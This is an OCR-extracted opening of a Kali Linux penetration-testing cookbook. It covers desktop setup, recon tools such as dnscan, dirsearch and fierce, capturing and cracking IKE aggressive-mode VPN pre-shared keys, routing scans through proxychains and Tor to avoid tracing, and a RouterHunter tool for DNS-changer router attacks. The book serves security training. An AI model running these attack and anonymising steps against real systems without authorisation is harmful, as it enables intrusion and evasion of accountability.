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Preface 


Kali Linux is the distro, which comes to mind when anyone thinks about penetration testing. Every year 
Kali is improved and updated with new tools making it more powerful. We see new exploits being 
released every day and with rapidly evolving technology, we have rapidly evolving attack vectors. This 
book aims to cover the approach to some of the unique scenarios a user may face while performing a 
pentest. 


This book specifically focuses on using the Kali Linux to perform a pentest activity starting from 
information gathering till reporting. This book also covers recipes for testing wireless networks, web 
applications, and privilege escalations on both Windows and Linux machines and even exploiting 
vulnerabilities in software programs. 


What this book covers 


Chapter 1, Kali — An Introduction, covers installing of Kali with different desktop environments, and 
tweaking it a bit by installing a few custom tools. 


Chapter 2, Gathering Intel and Planning Attack Strategies, covers recipes about collecting subdomains 
and other information about a target using multiple tools, such as Shodan, and so on. 


Chapter 3, Vulnerability Assessment, talks about the methods of hunting for vulnerabilities on the data 
discovered during information gathering process. 


Chapter 4, Web App Exploitation — Beyond OWASP Top 10, is about the exploitation of some of the unique 
vulnerabilities, such as serialization and server misconfiguration, and so on. 


Chapter 5, Network Exploitation on Current Exploitation, focuses on different tools, which can be used to 
exploit vulnerabilities in a server running different services, such as Redis, MongoDB and so on, in the 
network. 


Chapter 6, Wireless Attacks — Getting Past Aircrack-ng, teaching you some new tools to break into wireless 
networks, as well as using aircrack-ng. 


Chapter 7, Password Attacks — The Fault in Their Stars, talks about identifying and cracking different types 
of hashes. 


Chapter 8, Have Shell, Now What? covers different ways of escalating privilege on Linux and Windows- 
based machines and then getting inside that network using that machine as a gateway. 


Chapter 9, Buffer Overflows, discusses exploiting different overflow vulnerabilities, such as SEH, stack- 
based overflows, egg hunting, and so on. 


Chapter 10, Playing with Software-Defined Radios, focusses on exploring the world of frequencies and 
using different tools to monitor/view data traveling across different frequency bands. 


Chapter 11, Kali in Your Pocket — NetHunters and Raspberries, talks about how we can install Kali Linux 
on portable devices, such as Raspberry Pi or a cellphone, and perform pentest using it. 


Chapter 12, Writing Reports, covers the basics of writing a good quality report of the pentest activity once it 
has been performed. 


What you need for this book 


The OS required is Kali Linux with at least 2 GB of RAM recommended and 20-40 GB of hard disk 
space. 


The hardware needed for the device would be a RTLSDR device for Chapter 10, Playing with Software- 
Defined Radios and any of the devices mentioned in the following link for Chapter 11, Kali in Your Pocket — 
NetHunters and Raspberries: 


https://www.offensive-security.com/kali-linux-nethunter-download/ 


We also require Alfa card for Chapter 6, Wireless Attacks — Getting Past Aircrack-ng. 


Who this book is for 


This book is aimed at IT security professionals, pentesters and security analysts who have basic 
knowledge of Kali Linux and want to conduct advanced penetration testing techniques. 


Sections 


In this book, you will find several headings that appear frequently (Getting ready, How to do it..., How it 
works..., There's more..., and See also). To give clear instructions on how to complete a recipe, we use 


these sections as follows: 


Getting ready 


This section tells you what to expect in the recipe, and describes how to set up any software or any 
preliminary settings required for the recipe. 


How to do it... 


This section contains the steps required to follow the recipe. 


How it works... 


This section usually consists of a detailed explanation of what happened in the previous section. 


There's more... 


This section consists of additional information about the recipe in order to make the reader more 
knowledgeable about the recipe. 


See also 


This section provides helpful links to other useful information for the recipe. 


Conventions 


In this book, you will find a number of text styles that distinguish between different kinds of information. 
Here are some examples of these styles and an explanation of their meaning. Code words in text, database 
table names, folder names, filenames, file extensions, pathnames, dummy URLs, user input, and Twitter 
handles are shown as follows: "To launch fierce, we type fierce -h to see the help menu.” 


A block of code is set as follows: 


if (argc < 2) 


printf("strcpy() NOT executed....\n"); 
printf("Syntax: %s <characters>\n", argv[0]); 
exit(0); 

} 


Any command-line input or output is written as follows: 


| fierce -dns host.com -threads 10 


New terms and important words are shown in bold. Words that you see on the screen, for example, in 
menus or dialog boxes, appear in the text like this: "We right-click and navigate to Search for | All 
commands in all modules." 


i: Warnings or important notes appear like this. 


&% Tips and tricks appear like this. 






Reader feedback 


Feedback from our readers is always welcome. Let us know what you think about this book-what you 
liked or disliked. Reader feedback is important for us as it helps us develop titles that you will really get 
the most out of. To send us general feedback, simply e-mail feedback@packtpub.com, and mention the book's 
title in the subject of your message. If there is a topic that you have expertise in and you are interested in 
either writing or contributing to a book, see our author guide at www.packtpub.com/authors. 


Customer support 


Now that you are the proud owner of a Packt book, we have a number of things to help you to get the most 
from your purchase. 


Downloading the example code 


You can download the example code files for this book from your account at http//www.packtpub.com. If you 
purchased this book elsewhere, you can visit http//www.packtpub.com/support and register to have the files e- 
mailed directly to you. You can download the code files by following these steps: 


Log in or register to our website using your e-mail address and password. 
Hover the mouse pointer on the SUPPORT tab at the top. 

Click on Code Downloads & Errata. 

Enter the name of the book in the Search box. 

Select the book for which you're looking to download the code files. 
Choose from the drop-down menu where you purchased this book from. 
Click on Code Download. 


oe Se ea 


You can also download the code files by clicking on the Code Files button on the book's webpage at the 
Packt Publishing website. This page can be accessed by entering the book's name in the Search box. 
Please note that you need to be logged in to your Packt account. Once the file is downloaded, please make 
sure that you unzip or extract the folder using the latest version of: 


e WinRAR / 7-Zip for Windows 
e Zipeg /iZip / UnRarX for Mac 
e 7-Zip / PeaZip for Linux 


The code bundle for the book is also hosted on GitHub at https://github.com/PacktP ublishing/Kali-Linux-An-Ethical-Hacke 
rs-Cookbook. We also have other code bundles from our rich catalog of books and videos available at https:/git 
hub.com/PacktPublishing/, Check them out! 


Downloading the color images of this book 


We also provide you with a PDF file that has color images of the screenshots/diagrams used in this book. 
The color images will help you better understand the changes in the output. You can download this file 
from https://www.packtpub.com/sites/de fault/files/downloads/KaliLinuxAnEthicalHackersCookbook_ColorImages. pdf. 


Errata 


Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you find 
a mistake in one of our books-maybe a mistake in the text or the code-we would be grateful if you could 
report this to us. By doing so, you can save other readers from frustration and help us improve subsequent 
versions of this book. If you find any errata, please report them by visiting httpy/www.packtpub.com/submit-errata, 
selecting your book, clicking on the Errata Submission Form link, and entering the details of your errata. 
Once your errata are verified, your submission will be accepted and the errata will be uploaded to our 
website or added to any list of existing errata under the Errata section of that title. To view the previously 
submitted errata, go to https://www.packtpub.com/books/content/support and enter the name of the book in the search 
field. The required information will appear under the Errata section. 


Piracy 


Piracy of copyrighted material on the Internet is an ongoing problem across all media. At Packt, we take 
the protection of our copyright and licenses very seriously. If you come across any illegal copies of our 
works in any form on the Internet, please provide us with the location address or website name 
immediately so that we can pursue a remedy. Please contact us at copyright@packtpub.com With a link to the 
suspected pirated material. We appreciate your help in protecting our authors and our ability to bring you 
valuable content. 


Questions 


If you have a problem with any aspect of this book, you can contact us at questions@packtpub.com, and we will 
do our best to address the problem. 


Kali — An Introduction 


In this chapter, we will cover the following recipes: 


Configuring Kali Linux 
Configuring the Xfce environment 
Configuring the Mate environment 
Configuring the LXDE environment 
Configuring the e17 environment 
Configuring the KDE environment 
Prepping up with custom tools 
Pentesting VPN's ike-scan 

Setting up proxychains 

Going on a hunt with Routerhunter 


Introduction 


Kali was first introduced in 2012 with a completely new architecture. This Debian-based distro was 
released with over 300 tools specialized for penetration testing and digital forensics. It is maintained and 
funded by Offensive Security Ltd with core developers being Mati Aharoni, Devon Kearns, and Raphael 
Hertzog. 


Kali 2.0 came into the picture in 2016 with tons of new updates and new desktop environments such as 
KDE, Mate, LXDE, e17, and Xfce builds. 


While Kali is already pre-equipped with hundreds of amazing tools and utilities to help penetration 
testers around the globe to perform their job efficiently, in this chapter, we will primarily cover some 
custom tweaks that can be used to have an even better pentesting experience for the users. 


Configuring Kali Linux 


We will use the official Kali Linux ISO provided by Offensive Security to install and configure different 
desktop environments such as Mate, e17, Xfce, LXDE, and KDE desktops. 


Getting ready 


To start with this recipe we will use the 64-bit Kali Linux ISO listed on the Offensive Security website: 


https://www. kali.org/downloads/ 


a 


For users looking to configure Kali in a virtual machine such as VMware, VirtualBox, 
and so on, a pre-built image of the Linux can be downloaded from https://www.offensive-security. 


convkali-linux-vmware-virtualbox-image-download/. 





We will use the virtual image in this chapter and customize it with some additional tools. 


How to do it... 


You can configure Kali with the help of the given steps: 


1. Double-click on the VirtualBox image, it should open with VirtualBox: 


Oracle VM VirtualBox Manager 
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2. Click Import: 





Importing virtual disk image 'Kali-Linux-2016.2-vbox-amd64-disk1.vmdk' ... (2/3) 


























x) 
1 minute remaining | 
Description Configuration 
Virtual System 1 
ge Name Kali-Linux-2016.2-vbox-amd... 
® Product Kali Linux 
® Product-URL https://www.kali.org/ 
=> Vendor Offensive Security | 
® Vendor-URL https://www.offensive-secur... 
Reinitialize the MAC address of all network cards 
Appliance is not signed | 
Restore Defaults Go Back Import Cancel 


3. Start the machine and enter the password as toor: 


4. Now, Kali is started and by default is configured with the GNOME desktop environment: 





— DSF SS e OSs ene 








How it works... 


With the pre-built image you don't need to worry about the installation process. You can consider it as a 
ready-to-go solution. Simply click on run and the virtual machine will boot up Linux just like a normal 
machine. 


Configuring the Xfce environment 


Xfce is a free, fast, and lightweight desktop environment for Unix and Unix-like platforms. It was started 
by Olivier Fourdan in 1996. The name Xfce originally stood for XForms Common Environment, but 
since that time Xfce has been rewritten twice and no longer uses the XForms toolkit. 


How to do it... 


To configure the Xfce environment follow the given steps: 


1. We start by using the following command to install Xfce along with all plugins and goodies: 


apt-get install kali-defaults kali-root desktop-base xfce4 
xfce4-places-plugin xfce4-goodies 


The following screenshot shows the preceding command: 


File Edit View Search Terminal Help 


root@kali:~# apt-get install kali-defaults kali-root-login desktop-base xfce4 xfced4§ 
-places-plugin xfce4-goodiesf 





2. Type y when it asks for confirmation on additional space requirements. 
3. Select Ok on the dialogue box that appears. 


4. We select lightdm as our default desktop manager and press the Enter key. 
5. When the installation is complete we open a Terminal window and type the following command: 


| update-alternatives --config x-session-manager 


The following screenshot shows the output of the preceding command: 


root@kali: ~ 6 oe 8 
File Edit View Search Terminal Help 


root@kali:-~# update-alternatives --config x-session-manager 
here are 3 choices for the alternative x-session-manager (providing /usr/bin/x- 
Session-manager). 


Selection Priority Status 
/usr/bin/gnome-session auto mode 
/usr/bin/gnome-session 50 manual mode 
/usr/bin/startxfce4 50 manual mode 
/usr/bin/xfce4-session 40 manual mode 


Press <enter> to keep the current choice[*], or type selection number: JJ 





6. Choose the option xfce4-session (in our case 3) and press the Enter key. 


7. Log out and log in again or you can restart the machine and we will see the Xfce environment: 


2) pplications SaaS] 03:11 gf roc 





Configuring the Mate environment 


The Mate desktop environment was built in continuation of GNOME 2. It was first released in 2011. 


How to do it... 


To configure the Mate environment follow the given steps: 


1. We start by using the following command to install the Mate environment: 


| apt-get install desktop-base mate-desktop-environment 
The following screenshot shows the preceding command: 


root@kali: ~ eo @ \ 


File Edit View Search Terminal Help 
:~# apt-get install desktop-base mate-desktop-environment] 





2. Type y when it asks for confirmation on additional space requirements. 
3. When installation is complete we will use the following command to set Mate as our default 
environment: 


| update-alternatives --config x-session-manager 


4. Choose the option mate-session (in our case 2) and press the Enter key: 


root@kali: ~ oo 8 
File Edit View Search Terminal Help 


:~# update-alternatives --config x-session-manager 
There are 2 choices for the alternative x-session-manager (providing /usr/bin/x- 
session-manager) . 


Selection Priority Status 
/usr/bin/gnome-session auto mode 


/usr/bin/gnome-session manual mode 
/usr/bin/mate-session manual mode 


Press <enter> to keep the current choice[*], or type selection number: 2a 





5. Log out and log in again or restart and we will see the Mate environment: 
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© 01 - information Gathering , 
A, 02 - Vulnerability Analysis , 
©. 03 - web Application Analysis » 


~ Password Attacks 
4) 06 - Wireless Attacks , 
& 07 - Reverse Engineering , 
A 08 - Exploitation Tools , 


e 13 - Social Engineering Tools , @ sidguesser 

** 09 - Sniffing & Spoofing > B@ eoaice 

J 10 - Post Exploitation > @ SQLite database browser 
v 11 - Forensics , Pe] sqimap 

© 12- Reporting Tools > & sqininja 


fl 14 - System Services » & sqisus 
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Configuring the LXDE environment 


LXDE is a free open source environment written in C using GTK+ toolkit for Unix and other POSIX 
platforms. Lightweight X11 Desktop Environment (LXDE) is the default environment for many 
operating systems such as Knoppix, Raspbian, Lubuntu, and so on. 


How to do it... 


To configure the LXDE environment follow the given steps: 


1. We start by using the following command to install LXDE: 


| apt-get install lxde-core lxde 


2. Type y when it asks for confirmation on additional space requirements. 
3. When the installation is complete we open a Terminal window and type the following command: 


| update-alternatives --config x-session-manager 


The following screenshot shows the output for the preceding command: 


aaa aaa ee | 


root@kali: ~ oe 8 
File Edit View Search Terminal Help 


:~# update-alternatives --config x-session-manager 
There are 4 choices for the alternative x-session-manager (providing /usr/bin/x- 
session-manager). 


Selection Priority Status 


/usr/bin/gnome-session auto mode 

/usr/bin/gnome-session manual mode 
/usr/bin/\xsession manual mode 
PAUT A REIVA®) *1-11) 010) @o-1-1-t-B Ae) p manual mode 
/usr/bin/startlxde manual mode 





Press <enter> to keep the current choice[*], or type selection number: 4 





4. Choose the option 1xsession (in our case 4) and press Enter. 


5. Log out and log in again and we will see the LXDE environment: 


02 


12- 
13- 
14- 


- Vulnerability Analysis 
03 - 
04 - 
0s - 
06 - 
07 - 
08 - 
09 - 
10- 


x 
¥ i1- 
x 
Ti 


Web Application Analysis 
Database Assessment 
Password Attacks 
Wireless Attacks 
Reverse Engineering 
Exploitation Tools 
Sniffing & Spoofing 

Post Exploitation 
Forensics 

Reporting Tools 

Social Engineering Tools 
System Services 


© Debian 
& usual applications 


Preferences 


Run 


@ Logout 


I) PO NE NS SS A NE MS SA NS SE NG ON NEE 


* ONS Analysis 

* IDSAPS identification 

* Live Host identification 

* Network & Port Scanners 
* OSINT Analysis 

* Route Analysis 

* SMB Analysis 

* SMTP Analysis 

* SNMP Analysis 

* SSL Analysis 


 dmitry 


dnmap-client 
dnmap-server 


© ike-scan 
® maltegoce 
i 3) netdiscover 


nmap 


@ por 
a recon-ng 
w sparta 


zenmap 


Oe We ae a a Ne 





Configuring the e17 environment 


Enlightenment, or otherwise known as E, is a window manager for the X Windows system. It was first 
released in 1997. It has lots of features such as engage, virtual desktop, tiling, and so on. 


How to do it... 


Due to compatibility issues and dependencies hassle it is better to set up the Kali environment as a 
different machine. This ISO image (Kali 64-bit e17) is already available on the official website of Kali 
Linux and can be downloaded from the following URL: 


https://www.kali.org/downloads/. 


Configuring the KDE environment 


KDE is an international community for free software. The plasma desktop is one of the most popular 
projects of KDE; it comes as a default desktop environment for a lot of Linux distributions. It was 


founded in 1996 by Matthias Ettrich. 


How to do it... 


To configure the KDE environment follow the given steps: 


1. We use the following command to install KDE: 


apt-get install kali-defaults kali-root-login desktop-base 
kde-plasma-desktop 


The following screenshot shows the output for the preceding command: 


root@kali: ~ 


File Edit View Search Terminal Help 
root@kali:~# apt install kali-defaults kali-root-login desktop-base kde-plasma-desktopff 





2. Type y when it asks for confirmation on additional space requirements. 
3. Click OK on both the windows that pop up. 
4. When the installation is complete we open a Terminal window and type the following command: 


| update-alternatives --config x-session-manager 


The following screenshot shows the output for the preceding command: 


File Edit View Search Terminal Help 


rootekali:-# update-alternatives --config x-session-manager 
There are 2 choices for the alternative x-session-manager (providing /usr/bin/x-session-manager) . 


Selection Priority Status 
/usr/bin/gnome-session auto mode 


/usr/bin/gnome-session manual mode 
/usr/bin/startkde manual mode 


Press <enter> to keep the current choice[*], or type selection number: 2 
update-alternatives: using /usr/bin/startkde to provide /usr/bin/x-session-manager (x-session-manager) in manual mode 
root@kali:~# 





5. Choose the option KDE session (in our case 2) and press Enter. 
6. Log out and log in again and we will see the KDE environment: 
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Kali already has provided prebuilt images of different desktop environments. These can 


be downloaded from here: https://www.kali.org/downloads/. 


Prepping up with custom tools 


These tools you will install are open source available on GitHub. They are much faster and contain 
collections of different tweaks that people have included over a period of time during their own 
pentesting experience. 


Getting ready 


Here is a list of some tools that you will need before we dive deeper into penetration testing. Not to 
worry, you will be learning their usage with some real-life examples in the next few chapters. However, 
if you still wish to learn basics in an early stage it can simply be done with simple commands: 


® toolname -help 


@® toolname -h 


How to do it... 


Some of the tools are listed in the following sections. 


Dnscan 


Dnscan is a Python tool that uses a wordlist to resolve valid subdomains. To learn about Dnscan follow 
the given steps: 


1. We will use a simple command to clone the git repository: 


| git clone https://github.com/rbsec/dnscan. git 


The following screenshot shows the preceding command: 





re 


root@kali: / 





2. You can also download and save it from https://github.com/rbsec/dnscan. 
3. Next we browse into the directory where we downloaded Dnscan. 


4. Run Dnscan by using the following command: 


| ./dnscan.py -h 


The following screenshot shows the output for the preceding command: 


:/# cd dns 
usage: dnscan.py [-h] -d DOMAIN [-w WORDLIST] [-t THREADS] [-6] [-z] [-r] [-T] 
[-o OUTPUT FILENAME] [-D] [-v] 


optional arguments: 
-h, --help 
-d DOMAIN, --domain DOMAIN 
-w WORDLIST, --wordlist WORDLIST 


show this help message and exit 
Target domain 
Wordlist 


-t THREADS, --threads THREADS 
-6, --ipv6 

-Z, --zonetransfer 
-r, --recursive 
-T, --tld 
fe) 


Number of threads 

Scan for AAAA records 

Only perform zone transfers 
Recursively scan subdomains 
Scan for TLDs 


OUTPUT FILENAME, --output OUTPUT FILENAME 


-D, --domain-first 


an# 


Write output to a file 


Output domain first, rather than IP 





Subbrute 


Next we will install subbrute. It is amazingly fast and provides an extra layer of anonymity as it uses 
public resolvers to brute force the subdomains: 


1. The command here is again simple: 


| git clone https://github.com/TheRook/subbrute. git 


The following screenshot shows the preceding command: 


root@kali: ~ iY 


File Edit View Search Terminal Help 
:~# git clone https://github.com/TheRook/subbrute. git] 





2. Or you can download and save it from https:/github.com/TheRook/subbrute. 
3. Once the installation is complete we will need a wordlist for it to run for which we can download 
dnspop's list. This list can be used in the previous recipe too: https://github.com/bitquark/dnspop/tree/master/result 


S. 
4. Once both are set up we browse into the subbrute's directory and run it using the following 
command: 


| ./subbrute. py 


5. To run it against a domain with our wordlist we use the following command: 


| ./subbrute.py -s /path/to/wordlist hostname.com 


Dirsearch 


Our next tool in the line is dirsearch. As the name suggests it is a simple command-line tool that can be 
used to brute force the directories. It is much faster than the traditional DIRB: 


1. The command to install is: 


| git clone https://github.com/maurosoria/dirsearch. git 


2. Or you can download and save it from https://github.com/maurosoria/dirsearch. The following screenshot 
shows the preceding command: 


root@kali: ~ eee 


File Edit View Search Terminal Help 
:~# git clone https://github.com/maurosoria/dirsearch. git} 





3. Once the cloning is complete browse to the directory and run the tool by using the following: 


| ./dirsearch.py -u hostname.com -e aspx, php 


The following screenshot shows the output for the preceding command: 





root@kali: ~/dirsearch 


File Edit View Search Terminal Help 


Extensions: pl, html Threads: 18 | Wordlist size: 5541 
Error Log: /root/dirsearch/logs/errors-16-12-87 67-34-06.log 
Target: google.com 


[07:34:06] Starting: 
https: //www.google.com/2602 
https: //www.google.com/2601 
https: //www.google.com/2063 
https: //www.google. com/2607 
https: //www.google.com/2005 
https: //www.google.com/2608 
https: //www.google.com/2006 
https: //www.google.com/2609 
https: //www.google.com/2611 
https://www.google.com/2612 
https: //www.google.com/2010 
https: //www.google.com/2613 
https: //www.google.com/2604 
-> https://www.google.com/BingSiteAuth. xml 
https: //www.google.com/a 
-> https://www.google.com/about.html 
-> https://www.google.com/about 
-> https://www.google.com/account 
-> https://accounts.google.com/ManageAccount 
-> https://accounts.google.com/login 
-> https://accounts.google.com/ManageAccount 
-> http://accounts.google.com/login.pl 
-> http://accounts.google.com/login. html 
-> http://accounts.google.com/login.py 
-> http://accounts.google.com/login.jsp 
-> http://accounts.google.com/login.rb 
-> http://accounts.google.com/login. html 
-> http://accounts.google.com/login.htm 
-> http://accounts.google.com/logon 
-> http://accounts.google.com/signin 
-> http://accounts.google.com/login.shtml 


-> 
-> 
-> 
-> 
-> 
-> 
-> 
-> 
-> 
-> 
-> 
-> 
-> 


Last request to: admin info.pl 


© 


( 





Pentesting VPN's ike-scan 


Often during a pentest we may encounter VPN endpoints. However, finding vulnerabilities in those 
endpoints and exploiting them is not a well known method. VPN endpoints use Internet Key Exchange 
(IKE) protocol to set up a security association between multiple clients to establish a VPN tunnel. 


IKE has two phases, phase 1 is responsible for setting up and establishing secure authenticated 
communication channel, and phase 2 encrypts and transports data. 


Our focus of interest here would be phase 1; it uses two methods of exchanging keys: 


e Main mode 
e Aggressive mode 


We will hunt for aggressive mode enabled VPN endpoints using PSK authentication. 


Getting ready 


For this recipe we will use the tools ike-scan and ikeprobe. First we install ike-scan by cloning the git 
repository: 


| git clone https://github.com/royhills/ike-scan.git 


Or you can use the following URL to download it from https:/github.com/royhills/ike-scan. 


How to do it... 


To configure ike-scan follow the given steps: 


1. Browse to the directory where ike-scan is installed. 
2. Install autocont by running the following command: 


| apt-get install autoconf 


Rum autoreconf --install tO generate a .configure file. 

Run ./configure. 

Run make to build the project. 

Run make check to verify the building stage. 

Run make install to install ike-scan. 

To scan a host for an aggressive mode handshake, use the following commands: 


eo eS ee 


| ike-scan x.x.x.x -M -A 


The following screenshot shows the output for the preceding command: 


Starting ike-scan 1.9.4 wi osts ) ww.nta-monitor.com/tools/ike-scan/) 
Main 
HDR=( CKY -R=1f ) 
SA=(Enc=3DES Has ils Jp=2:modp1024 Auth=PSK Lifelype=Seconds LifeDuration=28800) 


IKE Backoff Patterns: 


IP Address Now te time Jelta Time 
' 1 5249 .384123 ) 
Implementation guess: Linksys Etherfast 


Ending ike-scan 1.9.4: 1 hosts scanned in 60.452 seconds (0.02 hosts/sec). 1 returned handshake; 0 returned 





9. Sometimes we will see the response after providing a valid group name like (vpn): 


| ike-scan x.x.x.x -M -A id=vpn 


The following screenshot shows the example of the preceding command: 


root@kali: ~ 


File Edit View Search Terminal Help 
:~# ike-scan -h 
Usage: ike-scan [options] [hosts...] 


Target hosts must be specified on the command line unless the --file option is 
given, in which case the targets are read from the specified file instead. 


The target hosts can be specified as IP addresses or hostnames. You can also 
specify IPnetwork/bits (e.g. 192.168.1.0/24) to specify all hosts in the given 
network (network and broadcast addresses included), and IPstart-IPend 

(e.g. 192.168.1.3-192.168.1.27) to specify all hosts in the inclusive range. 


These different options for specifying target hosts may be used both on the 
command Line, and also in the file specified with the --file option. 


In the options below a letter or word in angle brackets Like <f> denotes a 
yy value or string that should be supplied. The corresponding text should 
indicate the meaning of this value or string. When supplying the value or 
| jstring, do not include the angle brackets. Text in square brackets Like [<f>] 
_\mean that the enclosed text is optional. This is used for options which take 
| jan optional argument. 


Options: 


--help or -h pedir this usage i a and exit. 





We can even brute force the groupnames using the following script: 
https://github.con/SpiderLabs/groupenum. 





The command: 
./dt_group_enum.sh x.x.xX.X groupnames.dic 


Cracking the PSK 


To learn how to crack the PSK follow the given steps: 


oe aa a 


oR 


Adding a -p flag in the ike-scan command it will show a response with the captured hash. 
To save the hash we provide a filename along with the -p flag. 
Next we can use the psk-crack with the following command: 


psk-crack -b 5 /path/to/pskkey 


Where -b is brute force mode and length is s. 
To use a dictionary based attack we use the following command: 


psk-crack -d /path/to/dictionary /path/to/pskkey 
The following screenshot shows the output for the preceding command: 


Starting psk-crack [ike-scan 1.9] (http://www.nta-monitor.com/tools/ike-scan/) 
Running in dictionary cracking mode 


key "123456" matches SHA1 hash d46e5c224092fedda5a1733aa71e515d0dfbb97e 
Ending psk-crack: 1 iterations in 0.014 seconds (72.87 iterations/sec) 





How it works... 


In aggressive mode the authentication hash is transmitted as a response to the packet of the VPN client that 
tries to establish a connection Tunnel (IPSEC). This hash is not encrypted and hence it allows us to 
capture the hash and perform a brute force attack against it to recover our PSK. 


This is not possible in main mode as it uses an encrypted hash along with a six way handshake, whereas 
aggressive mode uses only three way. 


Setting up proxychains 


Sometimes we need to remain untraceable while performing a pentest activity. Proxychains helps us by 
allowing us to use an intermediary system whose IP can be left in the logs of the system without the worry 
of it tracing back to us. 


Proxychains is a tool that allows any application to follow connection via proxy such as SOCKSS, Tor, 
and so on. 


How to do it... 


Proxychains is already installed in Kali. However, we need a list of proxies into its configuration file that 
we want to use: 


1. To do that we open the config file of proxychains in a text editor with this command: 


| leafpad /etc/proxychains.conf 


The following screenshot shows the output for the preceding command: 


*proxychains.conf 


File Edit Search Options Help 
ProxyList format ii 
type host port [user pass] 
(values separated by ‘tab' or 'blank') 


# 
# 
# 
# 
# 
# Examples: 

# 

# socks5 192.168.67.78 1080 lamer secret 
# http 192.168.89.3 8080 justu hidden 
# 

# 

# 

# 

# 

# 

# 

[ 

\ 


socks4 192.168.1.49 1080 
http 192.168.39.93 8080 


proxy types: http, socks4, socks5 
( auth types supported: "basic"-http "user/pass"-socks ) 





# meanwile 
# defaults set to "tor" 
socks4 127.0.0.1 9050 Iv 


We can add all the proxies we want in the preceding highlighted area and then save. 


Proxychains also allows us to use dynamic chain or random chain while connecting to proxy 
servers. 


2. In the config file uncomment the dynamic_chain or random_chain: 


*proxychains.conf =o | x] 


File Edit Search Options Help 





# The option below identifies how the ProxyList is treated. 
# only one option should be uncommented at time, 

# otherwise the last appearing option will be accepted 

# 





ynami 


Dynamic - Each connection will be done via chained proxies 
all proxies chained in the order as they appear in the list 
at least one proxy must be online to play in chain 

(dead proxies are skipped) 

otherwise EINTR is returned to the app 


strict_chain 

Strict - Each connection will be done via chained proxies 
all proxies chained in the order as they appear in the list 
all proxies must be online to play in chain 

otherwise EINTR is returned to the app 


random_chain 





# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 


Random - Each connection will be done via random proxy 
Lm nm Fade te 


oe a a es oe ee ee 





























Using proxychains with tor 


To learn about tor follow the given steps: 


1. To use proxychains with tor we first need to install tor using the following command: 


| apt-get install tor 


2. Once it is installed we run tor by typing tor in the Terminal. 
3. We then open another Terminal and type the following command to use an application via 
proxychains: 


| proxychains toolname -arguments 


The following screenshot shows the example of the preceding commands: 


root@kali: ~ 
File Edit View Search Terminal Help 


:~# proxychains nmap 8.8.8.8 File Edit View Search Terminal Help 
ProxyChains-3.1 (http://proxychains.sf.net) wastiviis 


Dec 07 08:23:67.600 [notice] I learned some more directory informa 
tion, but not enough to build a circuit: We need more microdescrip 


:23 EST ‘ = E = 7 

ors: we have 6/7198, and can only build 6% of Likely paths. (We h 
Nmap scan report for google-public-dns-a.google.com (8.8.8.8) ave @% of guards bw, 0% of siaatat 2 and 6% of i lard = 0% of 
Host is up (0.046s Latency). path bw.) : asia oe : 


Not shown: 998 filtered ports ) 7 -32- ‘ aa lay 
PORT STATE SERVICE rps 08:23:69.666 [notice] Bootstrapped 50%: Loading relay descr 


Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-12-07 68 


53/tcp open domain Dec 07 08:23:14.608 [notice] Bootstrapped 56%: Loading relay descr 
fiidg cp open https iptors 


Dec 07 08:23:15.666 [notice] Bootstrapped %: Loading relay descr 
iptors 

Dec 07 08:23:15.666 [notice] Bootstrapped %: Loading relay descr 
iptors 

Dec 07 08:23:15.660 [notice] Bootstrapped s: Loading relay descr 
iptors 

Dec 07 08:23:15.666 [notice] Bootstrapped s: Loading relay descr 
iptors 

Dec 07 08:23:17.666 [notice] Bootstrapped 860%: Connecting to the T 
or network 

Dec 07 08:23:17.666 [notice] Bootstrapped 90%: Establishing a Tor 

circuit 

Dec 07 08:23:18.6860 [notice] Tor has successfully opened a circuit 
. Looks like client functionality is working. 

Dec 07 08:23:18.008 [notice] Bootstrapped 100%: Done 


7 | o 


Nmap done: address (1 host up) scanned in 7.57 seconds 


1 IP 
ae | 





Going on a hunt with Routerhunter 


Routerhunter is a tool used to find vulnerable routers on a network and perform various attacks on it to 
exploit the DNSChanger vulnerability. This vulnerability allows an attacker to change the DNS server of 
the router hence directing all the traffic to desired websites. 


Getting ready 


For this recipe, you will again need to clone a git repository. 


We will use the following command: 


| git clone https://github.com/jh0Onbr/RouterHunterBR. git 


How to do it... 


To execute Routerhuntersr.php follow the given steps: 


1. Once the file is cloned, enter the directory. 
2. Run the following command: 


| php RouterHunterBR.php -h 


The following screenshot shows the output of the preceding command: 


root@kali: ~/RouterHunterBR eo e@ 8 


File Edit View Search Terminal Help 
:~/RouterHunterBR# php RouterHunterBR.php -h 


/ script exploit developed by INURL - BRAZIL - [ SCANNER RouterHunterB 





3. We can provide Routerhunter an IP range, DNS server IP's, and so on. 


Gathering Intel and Planning Attack Strategies 


In this chapter, we will cover the following recipes: 


Getting a list of subdomains 

Using Shodan for fun and profit 
Shodan Honeyscore 

Shodan plugins 

Using Nmap to find open ports 
Bypassing firewalls with Nmap 
Searching for open directories 
Performing deep magic with DMitry 
Hunting for SSL flaws 

Exploring connections with intrace 
Digging deep with theharvester 
Finding technology behind web apps 
Scanning IPs with masscan 

Sniffing around with Kismet 

Testing routers with firewalk 


Introduction 


We learned in the previous chapter the basics of hunting subdomains. In this chapter, we dive a little 
deeper and look at other different tools available for gathering Intel on our target. We start by using the 
infamous tools of Kali Linux. 


Gathering information is a very crucial stage of performing a penetration test, as every next step we take 
after this will totally be an outcome of all the information we gather during this stage. So it is very 
important that we gather as much information as possible before jumping into the exploitation stage. 


Getting a list of subdomains 


We don't always we have a situation where a client has defined a full detailed scope of what needs to be 
pentested. So we will use the following mentioned recipes to gather as much information as we can to 
perform a pentest. 


Fierce 


We start with jumping into Kali's Terminal and using the first and most widely used tool fierce. 


How to do it... 


The following steps demonstrate the use of fierce: 


1. To launch fierce, we type fierce -h to see the help menu: 


root@kau: ~ = a 


:~# fierce -h 
mn 1 gel - 2a 0} a @ 09 Iam Oo) ©) ite 2006,2007 - By RSnake at http://ha.ckers.org/fierce 


Usage: perl fierce.pl [-dns example.com] [OPTIONS] 


Overview: 
Fierce is a semi-lightweight scanner that helps locate non-contiguous 
IP space and hostnames against specified domains. It's really meant 
as a pre-cursor to nmap, unicornscan, nessus, nikto, et since all 
of those require that you already know what IP space 
for. This does not perform exploitation and does not n the wi 
internet indiscriminately. It is meant specifically to locate 1 
targets both inside and outside a corporate netw | 
DNS primarily you will often find mis-config 
internal address space. That's especially useful in targeted malware. 


Options: 
eelalal-1eal Attempt to make http connections to any non RFC1918 
9ub Li - This will output the return headers 





2. To perform a subdomain scan we use the following command: 


| fierce -dns host.com -threads 10 
